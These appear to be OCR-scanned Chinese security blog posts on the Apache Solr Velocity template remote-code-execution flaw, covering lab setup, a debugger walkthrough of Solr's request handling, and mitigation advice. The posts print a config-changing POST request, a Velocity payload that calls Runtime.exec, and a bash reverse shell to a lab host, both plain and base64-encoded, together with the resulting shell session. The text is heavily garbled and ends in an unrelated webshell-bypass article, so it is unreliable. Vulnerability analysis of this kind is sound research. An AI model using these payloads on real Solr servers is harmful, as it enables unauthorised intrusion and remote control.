， 可 影响 Apache Solr 7.x 到 8.2.0 (目前 最 新 版 本 ) ， 有 同学 不 知道 关于 如 何 进一步 进行 利 
地 搭建 环境 ， 供 大 家 交流 利用 方式 ; 


name: test-core 
| instanceDir test-core 
dataDir: data 

config: solrcontig.xmi r 


Schema: schema.xmi 
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€ C OQ a 不 安全 | 172.10.194.194:0983/se%r74/~cores tr 09 $4 






n `~ 
L4 
S (Jm D Add Case | a = Rename Swap is Reload 
olr 
test-core © Core 
dli Dashboard N 
stanTime less than a minute ago 
Leas Hotei Jhome /weirdbird007//salr-8,2.0/server/solr/test-core 
_ Core Admin — dataDie (home jweirdbird007 /soir-8.2.D/server/solr/test-core/data/ 
Java Properties 
Thread Dump di Index 
lastModified = 
version 2 r 
numDocs o 
maxDoc 0 
deletedDocs 0 
current 
directory org. apache. lucene store NRTCachingDicectory NRTCachmnyDirectory(MMapDirectory® /nome /weirdbird007 /solr-B.2.0/ server say 


core /data/index lockFactory- org.apache lucene. store. NativeFSLockFactory® 195 ba24a, maxCacheMB~48.0 maxMerdeSizeMg«a gy 


第 四 步 : 接着 访问 我 们 增加 的 那个 core 


€ C O © FEE 1216194334 test-core 


{ 

“responseHeader" : { 
"status":0, 
"QTime":20), 

"config":( 

“luceneMatchVersion": “org.apache.lucene.util.Version:8.2.0", 

“updateHandler":{ 
“indexWriter":{"closeWaitsForMerges":true}, 
"commitWithin":("softCommit":true), 
"autoCommit":( 

"maxDocs":-1, 
"maxTime":15000, 入 
"openSearcher":false], 
"autoSoftCommit":( 
"maxDocs":-1, 
"maxTime":-1)), 
"query":( 
"useFilterForSortedQuery":false, 
"queryResultWindowSize":20, 
"queryResultMaxDocsCached":200, 
"enableLazyFieldLoading":true, 
"maxBooleanClauses":1024, 
"filterCache":( 
"autowarmCount":"0^, 
"size":"512", 
"jnitialSize":"512", 
"class":"solr.FastLRUCache", 
"name" :"filterCache"), 

"queryResultCache":( 
"autowarmCount":"0", 
*size":"512", 
"initialSize":"512", 
"class":"solr.LRUCache", 
"name" :"queryResultCache"), 

"documentCache":( 
"autowarmCount":"Q", 
*gisg':"512*, 
"initialSize":"512", 
"class":"solr.LRUCache", 
"name" :"documentCache"), 

"ul 
"size":"10000", 
"showltems":"-1", 
"initialSize":"10", 
"name":"fieldValueCache")), 

"requestHandler":( 
"/select":{ 
"/select", 














首先 要 确定 config 里 两 个 值 为 true 才 能 进行 利用 ， 不 为 true 的 话 ， 发 送 第 一 步 的 攻击 报 文 ， 手 动 
改 ; 
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MEO © 不 安全 172.16.194,134:8983/solr/test-core/config = -4 
Mensup ol 7 
""useParams":" ANALYSIS DOCUMENT", 
"name" : " /analysis/document"), 
lysis/field":{ 
ass":"solr.FieldAnalysisRequestHandler", 
"| tartup':"lazy", 
4 eParams":" ANALYSIS FIELD", 
'name" : "/analysis/field"), 
bug/dump" : { 
lass":"solr.DumpRequestHandler", 
eParams":" DEBUG DUMP", 
"defaults":( 
"echoParams":"explicit", 
J "echoHandler":true), 
name" : "/debug/dump")), 
sponseWriter":{ 
:{ 
":"json", 
lass": 'solr.JSONResponseWriter", 
ontent-type':" text/plain; charset=UTF-8"}, 
oy? { 
artup":"lazy", 
"i"velocity", 
ass":"solr.VelocityResponseWriter", 
template.base.dir":"", k 
olr.resource.loader.e 


r.enabled":"false"} to 
"s"xslt", 


ass":"solr.XSLTResponseWriter", 
1tCacheLifetimeSeconds":5}}, 


nabled":"true", q- 


":"spellcheck", 


NN 


i 配置 的 报 文 ， 把 那 两 个 值 改 为 true 


/testcore/config HTTP/1.1 
.194.134:8983 
application/json 
ngth: 263 


| ryresponsewriter": { 

fo Lazy", 

"velocity", 

i "solr.VelocityResponsewriter", 
Base; dir": "", 

source. loader .enabled": WE 
resource, loader .enabled": "true" 
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Resp » - 


Params | Headers | Hex | [row Headers | Hex | 
POST soi tenicoreiconfia HTTP 1 HITTP/* 1 200 OF 

Host 172.16 104134% Content-Type. retain charset=utt-6 
Content-Type: apolcationáson. I Content Lengtm 150 

Content-Length 263; 














"reuponseHeoder" 

"etsi 

7094] 

"The response format is expesimental. Ris Nisy to change m the future *) 


Pole queryresponse writer” { 






yFesponce/.tter 


sioner enaner: wue 4897 


Won ioa der endibier? Neue" 


M ) ` 











< ; 0 T 172.165.194.134 


p 
8 
£ 

e 


HI Bs eee à Pt Rie Eig) ad 
| Solr * -— 


test core * Core 
| di Dashboard testcore 
| stan time about a minuie ago 
Logging 
aps, instanceDir home |weirdbirdQ97 /sotr- 8.2. 0/servin?solr testcore 
Il Core Admin dataDw home werrdbirdO07 /soir-8.2.0/ server! solr/testcore / data, 
Java Properties, 
Il Li à. Index 


li Thread Dump 


JastModihed 





| | Il version 2 
| sumDocs è 
maxDor a 
deleredDocs 0 

current 


directory 





he lucene store NRTCachingDirectory NRTCachingDirectoryiMMagDicectaryee [home jveeiibindQ07 /solt 
8 2 O/server/solt/tesicore /data/imdex lockFactory~ org apache lucene store NativeFSLackFactoryi? LO 5ba24a, maxCacheMIb 
maxMergeSizeMB=4 0) 


Documentation — @ Issue Tracker — 0 IRE Channel Community forum 


接着 可 发 送 执行 命令 的 payload ， 这 里 先进 行 执行 命令 的 回 显 











构造 利用 exp 
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exp 的 原理 就 是 : 利用 Velocity 模板 调用 java 语法 进行 命令 执行 Ff， 类 似 于 传 过 去 的 就 俐 SP 
HH; 有 个 坑 ， 调 试 了 很 久 ，velocity 里 没有 数组 ， 改造 官方 poc ， 构造 poc (exec(new 
» 就 会 出 现 问题 ， 所 以 需要 用 另外 一 个 方式 ，base64 编 码 的 方法 进行 bypass 这 个 坑 。 


.数组 访问 

的 访问 在 Velocity 中 存在 问题 ， 因 为 Velocity 只 能 访问 对 象 的 方法 ， 而 数组 
LANSIRA Array ， 所 以 虽然 数组 可 以 进行 入 环 列举 ， 但 却 不 能 定位 访问 特定 
MOTZ , 如 strs[2] , 数组 对 固定 位 置 元 素 的 访问 油 用 了 Array 的 反射 方法 

(c bject array, int index)， 而 Velocity 没 能 提供 这 样 的 访问 ， 所 以 数组 要 么 改 成 
帮 庆 他 类 容器 的 方式 来 包装 ， 要 么 就 通过 公用 Uti 类 的 方式 来 提供 , EANA 
要 访问 的 位 置 参数 ， 从 而 达到 返回 所 需 信 的 目的 ， 


利用 ， 进 行 反弹 shell 利用 bash 反弹 shell 


E 只 能 执行 单个 命令 的 缺陷 ， 当 存在 |,<,> 等 符号 的 符号 PE (uas 无 法 进 
hell 等 问题 ， 解决 办 法 : 可 使 用 base64 编码 http://www jackson-tca time 
shimi ,然后 在 进行 url 编码 填 入 替换 exec 里 的 paylaod 即 可 
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arent spaces within arguments. 
~~ 
Input type: 42 Bash PowerShell Python Perl 


bin/bash -c 'bash -i »&/dev/tcp/172.16.194.135/9989 0»&1] 


bash -c (echo,L2JpbiSi YXNoIC1jiCdiYXNoIC1pIDAmL2RIdi90Y3AVMTCyLjE2LjEBNC4xMzUvOTKk4OSAwPi- 
YxJw==}|{base64, -d)| (bash,-i) 


w w wu weirdbird00/ — weirdbird007 (Gubuntu: ~ — ssh weirdbird00/@1/2.16.194.134 — 122x44 


Connection from [172.16.194.135] port 9989 [tcp/*] accepted (family 2, sport 38866) 
:/tmp$ 
i/imp$ 
:/tmp$ 
:/tmp$ 
:/tmp$ 
:/tmp$ 
:/tmp$ 
:/tmp$ 
i/tmp$ 
' :/tmp$ 
:i/tmp$ 
i/tmp$ 
:/tmp$ ifconfig 
ifconfig 
br-01183ad56df4: flags=4099<UP, BROADCAST,MULTICAST> mtu 1500 
ether 02:42:23:07:42:91 txqueuelen @ (Ethernet) 
RX packets 8 bytes 0 (90.0 B) 
RX errors 0 dropped @ overruns 0 frame 0 
TX packets @ bytes 0 (0.0 B) 
i TX errors @ dropped 0 overruns @ carrier 0 collisions 9 


jbr-a46028559e13: flags-4099«UP,BROADCAST,MULTICAST» mtu 1500 

| ether 02:42:78:7d:a2:21 txqueuelen 0 (Ethernet) Í 
RX packets 0 bytes 0 (0.0 B) 

RX errors @ dropped @ overruns 0 frame 0 

TX packets 0 bytes 0 (0.0 B) 

TX errors ® dropped 0 overruns 0 carrier © collisions 0 


docker0: flags-4099«UP,BROADCAST,MULTICAST» mtu 1500 
ether 02:42:76:0c:89:8f txqueuelen 8 (Ethernet) 
RX packets © bytes © (0.0 B) 
RX errors 0 dropped 0 overruns 0 frame 0 
TX packets @ bytes 0 (0.0 B) 
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 
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q 


BrP E 


OY 平台 ， 请 求证 明 也 可 
kson-t.ca: ne-exec-payl 


id redirects great again tnrougn calls to Basn or Powershell and it also ensures tnat there 
spaces within arguments. 


" NER 





type: @Bash PowerShell Python Perl 


ems are displayed 


Download + 





Remote Addr Method Data User Agent Content Type Created At (UTC«0) 





Moyilla/5 0 (Macintosh: Intel Mac OS X 10 1 


-工具 下 载 中 心 


EStrategyonline/ 


ond solr.py — http://172.16.194.135:8983/ "ls -at /tmp/" 
E. 


>>> 2y>9y>>27>27>>>2>>>>>>>>>>>>>>>>>y>y>>y>y>>>>>>>>> 


Ma pm ci MEI A n 
"id 


Bython3 soir vem.py http://xxxx.com/ "whoami (SE A 6 fie 4 )" 


<> 6 GAREG, fr: http://www, jackson- 
bin/bash -c 'bash -1 »&/dev/tcp/172, 16.194. 





/runtime-exec-payloads,html fij 9h34 $$ t 55 baseó4 (IS VIR Ms 
5/9989 @>61' V H basedit IR AL 








decho, L2)pbi9ivXNo1Cij ICdiYXNoICipIDAmL2Rld190Y3AVMTCyL jE2L ) ESNCAxMZUVOTKAOSAwP 1 Y xJwe«) | (base64, -d) | (bash, -1) 


>>>>7> >>>>>》>>>>>>>》>>>>>>>>y>>7>>>>>>>>> 22> 22> 2> 


M. 3 B983/solr/750testcore/select ?q=1bdwt=velocityév. templatescustomky, template. custo 23set($xz' ' ]dS23set($rtz$x. class. forName( ‘java, lang. Runtime’ ) )«&23set($chr-$x. class, f 
Mea etiSstrasx.class. forName( java. lang. String! ))v23set (Sex=$rt, getRuntime() ,exec( 15828-1N2082Ft npS2F *) ) Sex, vai tFor() «&23set (SoutsSex get InputSt reae() ) &23foreachl Sie in 
MON (Schr. toChars (Sout. read{) ))h23end 





4096 Nov 2 06:17 .Andrwxr-xr-x 24 root root 4096 Oct 23 18:23 ..Vn-rw-rw-r-- 1 weirdbird807 weirdbird807 3 Nov 1 16:52 11234.tx 
1 1234.txtVn-rw-rw-r-- 1 weirdbirdé8? weirdbirde@7 — 1 Nov 1 16:46 123.txtYn-rw-rw-r-- 1 weirdbirdü07 weirdbir 3 Nov 1 16:20 1.txt\n- 
.Txfin-rw-nw-r-- 1 weirübirdé87 weirdbird0@7 — 3 Nov 1 12:45 3.txtNn-rw-rw-r-- 1 weirdbirdé07 weirdbirdóe7 3 Nov 1 12:45 5. txt\ndrwxrwxrwt 

















2 weirdbird807 veirdbirdbe7 4096 Nov 1 15:32 nsperfdato weirdbirdé87Vndrwxrwxrwt 2 root root 4096 Nov 1 09:00 .IC 

8B8B3-webapp- solr-any-2569618999879870895. d1rn-rw- 1 weirdbird007 weirdbird007 378 Nov 1 15:32 start 8638777354132 

roo! 4096 Nov 1 09:01 systemd-private-109/8606263a42eca7bb3783f 3bfbádc-systemd-reso ved. service-ysSisQ ndrwx 3 root roat 4096 
3542ec27bb370313b bádc-systesd-Linesyncd.service-tsbiOVVndrwxrwxrwt 2 root root 4096 Nov 1 09:00 .Test~unix\ndrw 2 root root 





7944\ndrwxtwxrwt 2 root root 4096 Nov 1 09:00 .X11-unix\ndrwxrwxrwt 2 root root 4096 Nov 10 





+XIM-undx\n? 


可 以 直接 访问 Solr 控 制 台 ， 通 过 访问 节点 配置 进行 getshell 获取 权限 。 那 么 ， 在 目 
推送 的 情况 下 ， 建 议 增加 solr 的 认证 模块 、 设 置 强 口令 ， 防 止 被 他 人 入 侵 。 
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Solr-RCE-via-Velocity-template 
0x01 环境 搭建 


solr 通 过 启动 的 时 候 加 上 -a 参数 ， 就 可 以 使 用 额外 的 JVM 参数 (例如 以 -X 开头 的 参数 ) 启动 1 
Solr， 下 面 开启 一 下 jdwp 的 远程 调试 。 : 


solr start -p 8988 -f -a "-Xdebug -Xrunjdwp:transport-dt socket, server=y, suspe 


0x02 漏洞 分 析 


可 以 看 到 这 个 filter 的 注释 说 的 ， 也 就 说 相关 路 径 都 会 先 发 送 到 这 个 SolrRequestFilter 进行 处 3 
m. 


«!— Any path (name) registered in solrconfig.xml will be sent to that filter 一 > 
«filter» 
i«filter-name»SolrRequestFilter«/filter-name» 
<filter-class>org.apache.solr.servlet.SolrDispatchFilter</filter-class> 
d bend 
Exclude patterns is a list of directories that would be short circuited by the 
SolrDispatchFilter. It includes all Admin UI related static content. 


NOTE: It is NOT a pattern but only matches the start of the HTTP ServletPath. 
—— 
«init-param» 
«param-name»exc ludePatterns«/param-name» 
<param-value>/partials/.+,/libs/.+,/css/.+,/js/.+,/img/.+,/templates/.+</param-value> 
«/init-param» 
</filter> 


选择 在 SolrRequestFilter 的 dofilter 处 下 个 断 点 ， 可 以 看 到 请 求 过 来 了 。 





public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletExcept i 
this.doFìlterirequest, response, chain, GEOID false); 





这 dofilter 方法 中 ， 这 里 会 先 获取 我 们 web.xml 中 的 excludePatterns 的 路 径 进行 正则 比 对 。 


if (matcher.lookingAt()) 4 
chain.doFilter(request, response); 
return; 





在 getHttpSolrCall 方法 中 最 后 的 处 理 结果 是 返回 一 个 HttpSolrCall WR. 


rvietRequest request. HttpServletResponse response. t e retry) 4 


d || {path.startswith( ) && !path.equals( ) ? new HttpSolrCali( 





有 省 调 用 cal 方 法 ， 来 到 了 HttpSolrCall#call 中 。 


HttpSolrCall call = -hetHttpSolrCall( request, response, retry) 
Executorutil. setServerThreadF lag(Boolean. TRUE) 


[ 


SolrDispatchFilter.Action result a ta 





Ba tipsolrcallcal * 一 直 往 下 走 ， 代 码 来 到 了 这 里 ， 根 据 switch 进行 选择 ， 这 里 的 action 
是 PROCESS ， 所 以 自然 进入 PROCESS 的 case 中 进行 处 理 ， 然 后 调用 this,execute 方法 来 


gh solrRsp 对 象 。 


(this.action) { > ; 
ADMIN: | > name = 
- hand LeAdminRequest () i Q9 ordinal = 6 
varl4 = Action.RETURN T : 
varl4 RS 
REMOTEQUERY: 
Sol rRequestInfo. setRequest! 
« remoteQuery ( 
varl4 = Action. RETURN 
varl4 
PROCESS: 
Method regMethod = Method.c 
HttpCacheHeaderUtil.setCac 
( . config.getHttpCac! 
SolrQueryResponse solrf 





Hutt HttpSolrCalléexecute 中 ， 首 先 调用 getCore 方法 获取 SolrCore WR, ABE 
SolrCore#execute 方法 。 





xecute(SolrQueryResponse rsp) { i si rQueryResponsed 
eg. getContext() 5. reg. getContextPath()); 
-getcore(). 


ee ee ee a ee 





Core getCore() { 


dexSchema 


update (oom TE 
> Q name= "t 


cloe(  » @ logid = 





SolrCorehexecute 方法 选择 在 handler.handleRequest 处 下 一 个 断 点 ， 为 什么 会 在 这 里 
四 因为 从 方法 名 称 来 看 ， 这 个 名 称 大 概 会 处 理 我 们 传 入 的 request 请 求 ， 这 里 由 于 我 们 请 求 


路径 是 /solr/test/config 实际 上 是 针对 这 个 config 进行 操作 ， 所 以 这 里 的 handler 对 象 是 
SoltContigHandler e 
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execute(SolrRequestHandler handler, SolrQueryRequest req. SolrQueryResponse rsp) ( 
(handler == ft 
String msg = + req.getParams().get{ 
log. warn( s Object {lt „logid, asg, req}) 
y SolrException(ÉrrorCode.BAD REQUEST msq) 
: 


preDecarateResponse(req, rsp} 
(requestLog. isDebugEnabled() && rsp.getToLog().size() > 8) 4 
requestLog. debug( rsp.getToLogAsString( . logid)) 

} 


handler. handieRequest (req rsp) 
postDecoratelesponse(handler, req, rsp) 
(esp.getTolLog(}.size{) > 9) 4 
(requestLog. isInfoEnabled({}) { 
requestLog. info( rsp. getToLogAsString( .logíd)); 


> $) name = f 
> Y className = 
» ® type = ind 
> SP initArgs = (Name 358 user 一 CONFIG)" 
> f attributes = (Col ons$Unmodil eM; in 
> $ children = { 5 

Q isFromSolrConfig = true 


代码 继续 下 行 ， 来 到 RequestHandlerBase 类 中 ， 这 个 类 调用 this.handleRequestBody 
2. 


SolrPluginUtils.setdefaults( defaults .appends invariants) 
req.getContext(). remove( ) 
rsp. sethttpCaching(< ris. httpCaching) 
this hand eRequestBody (req, rsp) 
Nanedlist headers rsp gethesponseteader ( ) 
(header {= UE! 
Object partialResults = header.get( ps 


而 这 个 handlerRequestBody 实际 上 是 一 个 抽象 类 ， 也 就 是 solr 实 际 通过 自己 的 路 由 分 发 ， 
url 请 求 ， 转 发 到 不 同 的 handler 进行 处 理 ， 这 是 我 的 理解 ， 可 能 存在 偏差 。 


hand leReques tBody(SolrQueryRequest varl, SolrQueryResponse var2) 4$ Exception 


Choose Implementation of handleRequestBody (41 methods found) 
(@) AnalysisRequestHandlerBase apache. solr. hand ib (solr~core-7, Pigs E 
Q AutoScalingHandler (org. apache. solr. cloud. autosea Line Lib (solr~core-?.Fu2. ja 
er ord. apace 1 sndler. admin lib (solr-core-7, 7:2. jar 
[c BlobHandler (org.ay handle ib (solr-core-7. 7:2. ja 
Q CdcrRequestHandler e solr handler ib (solr-core-7. 18s j 
@ CollectionsHandler } } lib (solr-core-7.7.2.] 


D] ContentStreanHandlerBase IU er) core-7. Td. ja! 
@ CoreAdninHandler |: ; T gr. admin) u lr-core-7. Fakes?! 
@ DumpRequestHandler he. solr. er) Lib (solr~core~7. 742,32! 


然后 在 SolrConfigHandler#handleRequestBody 中 就 可 以 看 到 一 些 处 理 了 ， 由 于 我 们 请 求 的 数 
据 类 型 是 json， 请 求 方式 POST， 所 以 自然 会 进入 command.handlerP0ST 进行 处 理 。 


jestiody(5o1 ueryfequest reg, SolrQue sponse rsp) t 
Been UD CK RUE se Desponse. cse 
String httpMethod = (String) req. getContext (). gett it thad”); 
“SOT CONT Tyna ter towan Tonea we treant tgnan (— req T 
if ("PO0sT",equals(httpMethod)). f 
f (configEditing disabled || t! Pese eC get) N 
String reason = configéditing disabled ? e to d ¢ T 2 "because ( £ 1 
throw new SolrException(ErrorCode. FORBIDDEN, soircenfig ed enables " + reason); 


f command.handlePOST(]; 
(Demet acetic RARE M 
RequestHandlerUtils. addtxperimentalFormatWarning(rsp): 


eise 4 
Command. hándleGET() ; 


跟 进 command.handlerPOsT ， 实 际 上 可 以 看 到 this.handleCommands 方法 进行 处 理 的 时 候 
overlay 对 象 的 值 正 是 我 们 已 经 传 入 的 。 





()»18& .equalst -parts.get(i))}) { 
params = RequestParams.getFreshRequestParams(t -feq.getCore{). getResourcel oadert / 
.handleParams(opsCopy, params) 


KonfigOverlayl: .Teq.getCore() .getResourceLoader()) 


"startup":" lazy", 

"nane": "velocity", 

"class" :"solr.VelocityResponseWriter", 
"tenplate.base.dir":"", 

“solr. resource. loader enabled" : "true", f 
“params. resource. Loader. enabled" :"true"))) i 





MEH SolrConfigHandler$command 的 handleCommands 方法 ， 这 里 通过 
SolrResourceLoader 类 加 载 资源 配置 ， 然 后 调用 SolrResourceLoader#persistConfLocally 75 
法 针对 文件 进行 操作 。 


jader loader = .req.getCore() .getResourceLoader() 
ZkSolrfesourceloader) ( 
= ZkController. persistConfigResourceToZooKeeper ( (ZkSolrResourceLoader) loader, overlay. getZnodeVers fon{) 
nfof E ops) 
aitForAllReplicasState( .req.getCore() .getCoreDescriptor().getCloudDescriptor().getCollectionName() 


.persistConfLocally( loader overlay. toByteArray()) 


-getCoreContainer().reload( . req. getCore(). getName() ) 


Og. INFOL Ops) 


A SolrResourceLoader#persistConfLocally 方法 可 以 看 到 ， 获 取 配 置 文件 路 径 ， 写 入 内 容 ， 
而 写 灾 部 分 的 正 是 我 们 通过 POST 方式 上 传 上 来 的 数据 。 


& !parentOir.mkdirs(}} 
+ Dir.getAbsolutePath() 


rorCode, SERVE 


confFile) 


istConfLocally(loader, rceName: "cor TIE 
oreContainer(). reload(this.req.getCore() .getNane( ) ) ; 


werlay.toByteArray()); 


“queryResponseWriter":{"velocity":{ 
“startup":" lazy", 
“name”: "velocity", 
"class":"solr.VelocityResponseWriter", 
*tenplate.base.dir":"", 
“solr. resource. loader. enabled": "true", 


edComponent (Comman 
: | 


i 
i 


“params. resource. loader. enabled": UON 


—————————————M ——— 


SdPlugins(typ}) .conta 











persistConfLocally:900, SolrResourceLoader (org.apache.solr.core) 
handleCommands:504, SolrConfigHandler$Command (org.apache. solr . handler) 
handlePOST:345, SolrConfigHandler$Command (org.apache.solr.handler) 
access$100:158, SolrConfigHandler$Command (org.apache.solr.handler) 
handleRequestBody:136, SolrConfigHandler (org.apache.solr.handler) 
handleRequest:199, RequestHandlerBase (org.apache.solr.handler) 
execute:2551, SolrCore (org.apache.solr.core) 

execute:711, HttpSolrCall (org.apache.solr.servlet) 

call:516, HttpSolrCall (org.apache.solr.servlet) 

doFilter:395, SolrDispatchFilter (org.apache.solr.servlet) 
doFilter:341, SolrDispatchFilter (org.apache.solr.servlet) 





当然 第 二 阶段 就 是 通过 模版 注入 ， 远 程 代码 执行 ， 代 码 断 点 还 是 下 到 call.call 位 置 











HttpSolrCall call = " (request, response, retry) 
ExecutorUtil.setServerThreadFl : TRUE) 


{ 


SolrDispatchFilter.Action result = call.call() 
tresorter y 
PASSTHROUGH: 
chain.doFilter(request, response) 


跟 进 HttpSolrCall#call 中 ， 跟 进 下 图 代码 中 的 this.getResponsewriter o 


.SolrReq. getc ontext(). ut ( - invalidStates) 
-writeResponse(solrRsp, responseWriter, reqMethod) 
在 HttpSolrCall#getResponsewriter ， 可 以 看 到 实际 上 循环 来 到 了 下 图 位 置 ， 调 用 的 是 


SolrCorezigetQueryResponseWriter 


Kevin ie aedi getResponseWriter() { 
| { 


vcore. getQueryResponseWriter( .SOLrReq) 





而 SolrCore#getQueryResponseWriter 实际 上 是 根据 请 求 参数 重 的 wt 字段 的 值 去 获取 
reponseWriter 对 象 ，payload 中 的 参数 是 velocity ， 所 以 这 里 最 后 的 返回 对 象 是 
VelocityResponseWriter. 


blic String get(String name) t 
Stri HE 


luftiMapSolrParams 


ES Variables 


Roy des muse "qu Lav.template=customédf_text_&v.ternplate.custom=dsett$x*24 
» © j 
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sponseWriter responsewWriter = .getResponseWriter() 
S e 


;solrReq.getC text ().put{ «invalidStates} 


ler) 


-writeResponse(solrRsp, responseWriter, regMethod) 










77: TREES 到 下 图 位 置 ， 我 们 看 到 writeResponse 方法 处 理 了 我 们 刚刚 的 


yelocityResponseWriter xy S. 


nsewriter responseWriter = -getResponsewriter(} 
-invalidStates f= IS 
soirReq. getContext{}.put{ «inval idStates} 


writeResponse(solrRsp, responseWriter, regMethod) 





PERH HttpSolrCall#writeResponse ， 代 码 调用 了 writeQueryResponse 方法 。 


= regMethod) { 
eam out = -response.getOutputStream{) M 
nsewriterUtil.wri ryResponse(out responseWriter .SolrReq, solrRsp, ct) 





RO- ÍT, AKE VelocityResponseWriter#write 当中 ， 然 而 刚 开始 时 候 ， 我 只 导入 了 solr- 
WebappEis* F WEB-INF 中 的 jar 文 件 ， 然 后 就 会 出 现下 图 中 的 情况 ， 明 明 debug 断 点 到 了 ， 但 是 无 
法 打开 查看 源 代码 。 后 面 深入 看 看 才 发 现 少 导 入 了 两 个 文件 的 jar， 一 个 是 dist 目录 中 的 jar 文件 ， 

B= contrib/velocity/lib 目录 下 的 Jar 文件 。 


{responsewriter Bin 
BinaryQueryResponsewriter binWr 
bin iter write(outputStream 


ervlet-2.3.0.jar 
ry- library- java- 1.0.0.jar 


writer = buil 
responsewriter.write( UrRequest, solrResponse} 
writer, 9 
人 一 一 ` 
} 
buildiriter( outputSt ream charset) 


writer » (charset = : (outputSt ream 
H IL. trean, charset) 


— 
QueryResponseWriterUUl — writeQueryResponsed 


Variables 
> S this « (Veloc 


z 
& esp 109 
» © request = Re 5110] "Iqe 1&v.templateecustom&díe text, &v.template.custo| 


i% 





EHR debug, 跟 进 VelocityResponseWriter#write ， 首 先 调用 createEngine 函数 处 理 我 们 
A request WR. 


"plate = getTemplate(engine, r 


ext context = CORBRECOIESRAS 
» engine); bt 





Template = request. getParams 
nabled = request. getParams j 19 this$0 = (SolrRequestP 
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( 


Propertyf i SolrParamResourceLoader]. request}} 








这 里 有 个 疑问 为 哈 paramsResourceLoaderEnabled 是 true， 本 质 原因 就 在 这 之 前 
HttpSolrCail#call 方 法 中 通过 getResponseWriter 方法 ， 进 一 步 来 到 
VelocityResponseWriter#init 方法 获取 到 我 们 之 前 第 一 步 修改 配置 文件 的 时 候 写 入 配置 文件 由 
的 params.resource.loader.enabled 和 solr.resource.loader.enabled 的 结果 ， 所 以 六 


自然 是 true。 


.Entry< > entry = headers. () 
resp. (entry. 0, entry. OH 
} 
Usps pon rir Cer TOSS en eR = getResponsewriter(); 
= ij "VerCONTE * teUoddsólrClient, 
lr Rsp responsewriter, reqMethod) 


prle = args.getBooleanArg 
oe ex prle? 


| 


srle = args.getBooleanArg( 
! vader htes a AM 


跟 进 SolrParamResourceLoader 类 ， 这 里 遍历 循环 我 们 payload 中 的 数据 ， 当 name 为 
vtemplate ， 我 们 在 payload 中 的 vtemplate 的 值 是 custom ， 所 以 这 里 实际 上 是 生成 了 
custom.vm 的 恶意 engine 。 








代码 回 到 createEngine 方法 中 ， 这 里 自然 paramsResourceLoaderEnabled true, | 原因 不 有 
说 ， 上 面 所 过 了 。 


x. ArrayList« E 
{) | 


SolrParamResourceLoader (request) } 


执行 完 这 两 个 if 之 中 的 SolrParamResourceLoader 和 SolrVelocityResourceLoader #2 lie 
代码 回 到 VelocityResponseWriter#write 中 ， 调 用 VelocityResponseWriter#getTemplate 方法 
处 理 刚刚 的 engine 对 象 ， 以 及 我 们 的 request 请 求 对 象 。 


writer, SälrQueryRequest requi 
VslocityEngine engine = createEngine(request) 


VetocityContexe tontért createContext ( request , res 
context. put (“e , engine); 
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BeyatonityResponseWriter#getTemplate 方法 中 回 根据 我 们 提交 的 vtemplate 参数 获取 我 们 构 
造 的 恶意 template 对 象 。 


template: Temptate@ess2 

















用 我 们 构造 好 的 恶意 template 的 merge 方法 ， 达 到 命令 模版 注入 的 效果 。 


eateEngine( request) 


nabled || jsonWrapper 
rge(context, Weiten template: Templatege552 context: VelocityContext@6603 writer: FastwWriterg6303 


模版 进入 到 template 的 merge 方法 ， 然 后 及 时 一 些 AST 解 析 过 程 。 最 后 补 上 核心 调用 栈 : 


6:347, Runtime (java.lang) 
oke0:-1, NativeMethodAccessorImpl (sun.reflect) 
0ke:62, NativeMethodAccessorImpl (sun.reflect) 
nVoke : 43, DelegatingMethodAccessorImpl (sun.reflect) 
0ke:498, Method (java.lang.reflect) 
oInvoke : 506, UberspectImpl$VelMethodImpl (org.apache.velocity.util.introspectic 
invoke: 494, UberspectImpl$VelMethodImpl (org.apache.velocity.util.introspection) 


e， 原 因 不 在 细 


cute:19g8, ASTMethod (org.apache.velocity.runtime.parser.node) 

3 Ute:304, ASTReference (org.apache.velocity.runtime.parser.node) 
ARGOS, ASTReference (org.apache.velocity.runtime.parser .node) 
18:72, ASTExpression (org.apache.velocity.runtime.parser.node) 

er :235, ASTSetDirective (org.apache.velocity.runtime.parser.node) 
er:377, SimpleNode (org.apache.velocity.runtime.parser.node) 


_ 98:359, Template (org.apache. velocity) 
7196:264, Tem 


ite:166, Vel 
E teQueryResp 
TiteRespon.,. 


plate (org.apache.velocity) 

OcityResponseWriter (org.apache.solr.response) 

onse:65, QueryResponseWriterUtil (org.apache.solr.response) 
873, HttpSolrCall (org.apache.solr.servlet) 

582, HttpSolrCall (org.apache.solr.servlet) 

ter:423, SolrDispatchFilter (org.apache.solr.servlet) 

ter :350, SolrDispatchFilter (org.apache.solr.servlet) 






dl 
ORT 
E. 
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| 


Jo 


0x03 流程 图 E me veloc 


ers 
d [ 
简单 绘制 一 个 流程 图 ， 方 便 自己 后 记 oa 


Rn 
t solrconf 


In yh 


«str 


TET ree 





0x04 后 话 


从 solr 官 方 网 站 可 以 看 出 ， 这 个 插件 实际 上 是 一 个 可 选项 ， 这 个 漏洞 本 质 还 是 配合 solr 未 授权 来 达到 
rce 的 目的 ， 所 以 实际 上 临时 解决 这 个 漏洞 最 优雅 的 方式 应 该 是 加 上 鉴 权 。 





350 


ks 








/velocity directory. 
"basic configs", 





and dependencies must be added (via «lib» or solr/home lib inclusion), and must be registered in 
jg xml like this: 


R sponseWriter velocity" “solr. VelocityResponseWriter"> 
template .base.dir">${velocity. template. base.dir:} 













à — HTTP/1.1 401 Unauthorized 
q=184wt=velocity&v.template=custom&v. template .custom=\23set ($x=%27%27 }+ Connection: close 

i5. forName(%27 java. lang .Runtime%27) )+%23set (Schr=Sx.class. forName(%27jav WWW-Authenticate: basic realm="verify name” 

427) )#423set(Sstr=$x.class.forName(\27 java. lang. String’27) )*323set (Sex-Sr Cache-Control: must-revalidate,no-cache,no-store 
(32710327) ) Sex .waitFor ( ) &23set (Sout -Sex .getInputStream( ) )&&23foreach Content-Type: text/html;charset-iso-8859-1 
/lable() ])$str .valueOf (Schr . toChars(Sout . read( ) ) )523end HTTP/1.1 Content-Length: 254 


contentz"text/html;charsetsutf-8"/» 
“> 





h2>HTTP ERROR 401</h?> 
«p»Problem accessing /solr/test/select. Reason: 
>  Unauthorized«/pre»«/o» 
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java webshell 从 入 门 到 入 狱 系列 2- 攻 防 对 抗 之 
Bypass- 上 篇 


前 言 


小 葵花 妈妈 课堂 开课 啦 ， 欢 迎 各 位 大 小 朋友 入 座 ， 上 篇 我 们 介绍 了 java 中 常见 的 webshell 的 的 
